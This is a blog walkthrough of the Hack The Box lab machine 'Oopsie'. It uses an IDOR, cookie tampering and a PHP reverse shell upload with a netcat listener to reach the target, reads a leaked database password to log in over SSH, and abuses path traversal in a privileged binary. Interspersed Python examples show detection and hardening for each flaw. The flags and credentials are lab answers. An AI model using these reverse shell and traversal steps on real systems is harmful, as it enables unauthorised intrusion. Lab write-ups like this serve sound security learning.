
Oopsie

  • Admin
  • Jul 1, 2022
  • 3 min read


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.129.95.191

Port 80 is open so let's check the website.

Open your browser and type in the url bar: http://10.129.95.191


As usual, let's start with gobuster. First, locate the wordlist we are going to use:

locate big.txt

Let's use this wordlist:

/opt/useful/SecLists/Discovery/Web-Content/big.txt


gobuster dir -u 10.129.95.191 -w /opt/useful/SecLists/Discovery/Web-Content/big.txt

Let's use Burp Suite. Open Burp Suite and click on the Proxy tab.

Turn off intercept

Click on Open Browser

In the URL bar, type http://10.129.95.191

Go back to Burp and click on the Target tab


We found something interesting: a directory called /cdn-cgi/login.

This directory was not picked up by our gobuster earlier.
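The gobuster run above produces a long burst of requests for paths that do not exist, which is exactly what a defender can look for in the web server's access log. The following is an added example (not code from the post or from Hack The Box): it parses combined-format log lines and flags any client that produced an unusual number of 404 responses inside a short window. The log lines, IP addresses, paths and user agent string are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# One Apache/nginx "combined" log line; only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforcers(lines, window_seconds=60, threshold=20):
    """Return {ip: peak} for every client with >= threshold 404s inside any window."""
    window = timedelta(seconds=window_seconds)
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):            # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample log (not a real capture): one scanner plus one ordinary visitor.
_BASE = datetime(2022, 7, 1, 10, 0, 0, tzinfo=timezone.utc)
_WORDS = ["admin", "backup", "cgi-bin", "config", "images", "login", "old", "test"]


def _stamp(seconds):
    return (_BASE + timedelta(seconds=seconds)).strftime("%d/%b/%Y:%H:%M:%S %z")


SAMPLE_LOG = [
    f'10.10.14.5 - - [{_stamp(i)}] "GET /{_WORDS[i % len(_WORDS)]}{i} HTTP/1.1" '
    f'404 275 "-" "gobuster/3.1.0"'
    for i in range(30)
] + [
    f'10.10.14.9 - - [{_stamp(5 + i)}] "GET {p} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"'
    for i, p in enumerate(["/", "/index.php", "/css/style.css"])
] + ["garbage line that is not a log record"]

if __name__ == "__main__":
    for ip, peak in find_bruteforcers(SAMPLE_LOG).items():
        print(f"{ip}: {peak} x 404 in one window (probable directory brute force)")
```

The rule keys on the 404 rate rather than on the user agent, since a scanner can send any user agent it likes. A path that is not in the wordlist, such as the /cdn-cgi/login directory the post finds later through Burp, never shows up in such a burst, so log-based detection sees the scan itself, not what the scan missed.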


Let's open the browser on our VM and type in the URL bar:

http://10.129.95.191/cdn-cgi/login


We do not know any credentials, but there is a link "Login as Guest".

Click on "Login as Guest"


We are logged in!


Let's click on Account


We are logged in as the user guest, with access ID 2233.


Look at the URL bar:


What if we were to change &id=2 into &id=1?


Let's try: change the id at the end of the URL and press Enter.


Now we can see there is another user called admin, with access ID 34322.


We were not meant to see that. It is a vulnerability of the target machine: any logged-in user can read another user's record simply by changing the id parameter, because nothing checks that the record belongs to the user who is asking.


So we just learned that the user guest has an access ID of 2233 and the user admin has an access ID of 34322.


Now let's click on the Uploads tab on the website:


This action requires super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!


Right click on this web page and click on Inspect (Q)

Now click on the Storage tab; we can see the following cookie:


At the moment we are logged in as the user guest, with access ID 2233.

What if we could change the cookie so that we are now the user admin, with access ID 34322?


Let's try! Replace guest with admin and replace 2233 with 34322.


Now refresh the Uploads page, and we get the following:


We are now admin and we can upload files! The application trusts the user name and access ID stored in the cookie instead of checking them on the server side.
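Both weaknesses the walkthrough just used have the same root cause: the application decides who you are and what you may see from values the browser supplies (the id in the URL, and the user and access ID in the cookie). The following added example, which is not code from the post or from the target application, contrasts that pattern with one where an opaque server-side session decides identity and the stored account record decides the role. The account table, the session store and the request dictionaries are constructed stand-ins for a real web framework.

```python
import secrets

# Constructed account table; the names and access IDs mirror the ones seen on the page.
ACCOUNTS = {
    1: {"name": "admin", "access_id": 34322, "role": "admin"},
    2: {"name": "guest", "access_id": 2233, "role": "guest"},
}


# ---- Vulnerable pattern: authorization decisions come from client-controlled data ----

def account_page_vulnerable(query, cookies):
    """Returns whichever record ?id= asks for; nothing checks who is asking."""
    return ACCOUNTS.get(int(query.get("id", 0)))


def uploads_page_vulnerable(cookies):
    """Grants upload rights if the cookie says so, and the client writes that cookie."""
    return cookies.get("role") == "admin"


# ---- Hardened pattern: an opaque server-side session decides who you are ----

SESSIONS = {}   # session token -> account id (in memory here; a real app uses a session store)


def login(account_id):
    """Issue an unguessable session token; only the token is sent to the browser."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = account_id
    return token


def current_user(cookies):
    """Resolve the session cookie to (account id, record), or (None, None)."""
    acct_id = SESSIONS.get(cookies.get("session", ""))
    return (acct_id, ACCOUNTS[acct_id]) if acct_id in ACCOUNTS else (None, None)


def account_page_hardened(query, cookies):
    """Only the owner of a record, or an admin, may read it; the id alone proves nothing."""
    my_id, me = current_user(cookies)
    if me is None:
        return None                        # not logged in
    try:
        target_id = int(query.get("id", ""))
    except ValueError:
        return None
    if me["role"] != "admin" and target_id != my_id:
        return None                        # deny the cross-account read used on the page
    return ACCOUNTS.get(target_id)


def uploads_page_hardened(cookies):
    """The role comes from the server-side account record, never from a cookie field."""
    _, me = current_user(cookies)
    return me is not None and me["role"] == "admin"


if __name__ == "__main__":
    guest = login(2)
    print("guest reads id=1 (vulnerable):", account_page_vulnerable({"id": "1"}, {}))
    print("guest reads id=1 (hardened):  ", account_page_hardened({"id": "1"}, {"session": guest}))
    print("edited cookie -> uploads (hardened):", uploads_page_hardened({"session": guest, "role": "admin"}))
```

With the hardened handlers, changing id=2 to id=1 or editing the cookie no longer helps: the guest session still cannot read the admin record and still cannot reach Uploads. In a real application the session cookie should also be marked HttpOnly and Secure and be re-issued on login.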




Foothold


Now let's try to upload a file.


Let's first locate the PHP reverse shell file and edit it.


Open a new command prompt from your VM and type:

locate webshells/php

cd /usr/share/webshells/php

then:

ls

We are interested in php-reverse-shell.php.


Let's make a copy of this file into our home directory by typing:

cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php

My username is htb-sneakymouse on my VM, which is why I used /home/htb-sneakymouse. Replace this with your own username.

Now open a brand new command prompt and type:

ls

I can see oopsie.php has been successfully copied to my home directory.

Let's now edit oopsie.php using:

sudo nano oopsie.php

Scroll down until you see $ip and $port.


We need to change both the IP and the port:

- replace 127.0.0.1 with the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0

- replace 1234 with 4444 (we will listen on port 4444 when we set up our netcat listener later)


Press Ctrl + X to exit

Press Y (to save)

Press enter


Now let's upload this file to the target machine. Let's go back to the Uploads tab on the website:


We can now click on Browse.

Select our file oopsie.php and click on Open.


Now click on Upload


Looks like our file oopsie.php has been uploaded successfully. However, we still don't know where it has been uploaded.


Remember earlier, when we ran the gobuster command, it found a directory called /uploads.

Perhaps this is where the file has been uploaded!
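The Uploads page accepted a .php file and stored it under the web root, where the server later executed it. The added example below (not the post's or the application's code) shows the checks a server-side upload handler would perform instead: allowlist the extension, confirm that the content's leading bytes match the declared type, discard the client-supplied name and store the file under a random server-chosen name. The magic-byte table and the size limit are assumptions for the example.

```python
import os
import secrets

# Allowed extensions and the leading bytes a file of that type must start with (assumed table).
ALLOWED = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
    ".pdf": [b"%PDF-"],
}
MAX_BYTES = 5 * 1024 * 1024   # assumed size limit


def validate_upload(filename, content):
    """Return (ok, reason, server_name). The client's name and extension are never trusted alone."""
    if len(content) > MAX_BYTES:
        return False, "file too large", None
    base = os.path.basename(filename.replace("\\", "/"))   # drop any path the client sent
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed", None
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match the declared type", None
    # The stored name is chosen by the server: no 'oopsie.php', no traversal, no guessable URL.
    return True, "ok", secrets.token_hex(16) + ext


def store_upload(filename, content, storage_dir):
    """Validate, then write under storage_dir (which should live outside the web root)."""
    ok, reason, server_name = validate_upload(filename, content)
    if not ok:
        raise ValueError(reason)
    os.makedirs(storage_dir, exist_ok=True)
    path = os.path.join(storage_dir, server_name)
    with open(path, "wb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    # Constructed inputs: a PHP file under its own name, a PHP file with a double extension,
    # and a genuine PNG header.
    samples = [
        ("oopsie.php", b"<?php echo 'hi'; ?>"),
        ("photo.php.jpg", b"<?php echo 'hi'; ?>"),
        ("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, data in samples:
        print(name, "->", validate_upload(name, data))
```

Even with these checks in place, the storage directory should sit outside the web root, or be served with script execution disabled, because a file that passes a magic-byte test can still carry script code later in its body.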


First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:

nc -lnvp 4444

Now let's try to locate and run the oopsie.php we just uploaded to the target machine. In the URL bar, type:


Nothing should happen in the browser, but if you go back to your netcat (nc) command prompt, you should now have a shell:


Type:

whoami

Let's upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ls

cd home
ls


cd robert
ls

cat user.txt

f2c74ee8db7983851ab2a96a44eb7981


Congratulations! You got the user flag!




Lateral Movement


sudo -l

Unfortunately, we don't have the password.


Let's explore the files on the target machine. Let's start with /var/www/html:

cd /var/www/html

ls

cd cdn-cgi
ls

cd login
ls

cat db.php

Looks like we found some credentials:

username: robert

password: M3g4C0rpUs3r!


This shell is not very stable, but now we have some credentials!


We know from the nmap scan at the beginning that port 22, which is associated with SSH, is open on the target machine. Let's try to SSH in using robert's credentials:

ssh robert@10.129.95.191

The password is:

M3g4C0rpUs3r!

We are in!

id

Privilege Escalation

locate bugtracker

cd /usr/bin

bugtracker

Type 1, for instance.



bugtracker

This time, type hello, for instance.


Interesting: this time we get /root/reports/hello: No such file or directory. Whatever we type is appended to the path /root/reports/ without any validation.


bugtracker

This time, type:

../root.txt

Congratulations! You found the root flag!


af13b0bee69f8a877c3faf667f7beacf
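The behaviour observed above (hello becomes /root/reports/hello, and ../root.txt walks out of that directory) is a path traversal: the bug ID is appended to a fixed directory with no validation. The following added example, which is not bugtracker's actual source (the post does not show it), models the vulnerable lookup next to a hardened one that accepts only numeric IDs and verifies that the canonical path still lies inside the report directory. The /root/reports directory comes from the error message on the page; everything else is constructed.

```python
import os
import re

REPORT_DIR = "/root/reports"   # taken from the error message shown on the page


def report_path_vulnerable(report_id):
    """Mirrors the observed behaviour: user input is glued onto the directory name."""
    return REPORT_DIR + "/" + report_id


def resolve_vulnerable(report_id):
    """Where the vulnerable path actually points once '..' components are applied."""
    return os.path.normpath(report_path_vulnerable(report_id))


def report_path_hardened(report_id, base=REPORT_DIR):
    """Accept only a numeric bug ID and refuse anything that resolves outside `base`."""
    # 1. Syntactic allowlist: a bug ID is a plain decimal number and nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", report_id):
        raise ValueError("report id must be numeric")
    # 2. Canonicalise and confirm the result is still under the report directory.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, report_id))
    if os.path.commonpath([candidate, base_real]) != base_real:
        raise ValueError("path escapes the report directory")
    return candidate


if __name__ == "__main__":
    for raw in ("1", "hello", "../root.txt"):
        print(raw, "-> vulnerable lookup reads", resolve_vulnerable(raw))
        try:
            print(raw, "-> hardened lookup reads", report_path_hardened(raw))
        except ValueError as err:
            print(raw, "-> hardened lookup rejects it:", err)
```

The second check is defence in depth: the numeric allowlist alone already rejects both inputs from the page, but canonicalising and comparing against the base also catches the case where a later change loosens the allowlist. Since bugtracker is evidently able to read files in /root while run as robert, fixing the path check is only half of the remedy; the binary should not carry privileges it does not need for reading its own report directory.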

 
 
 


©2025 by My Tech On IT
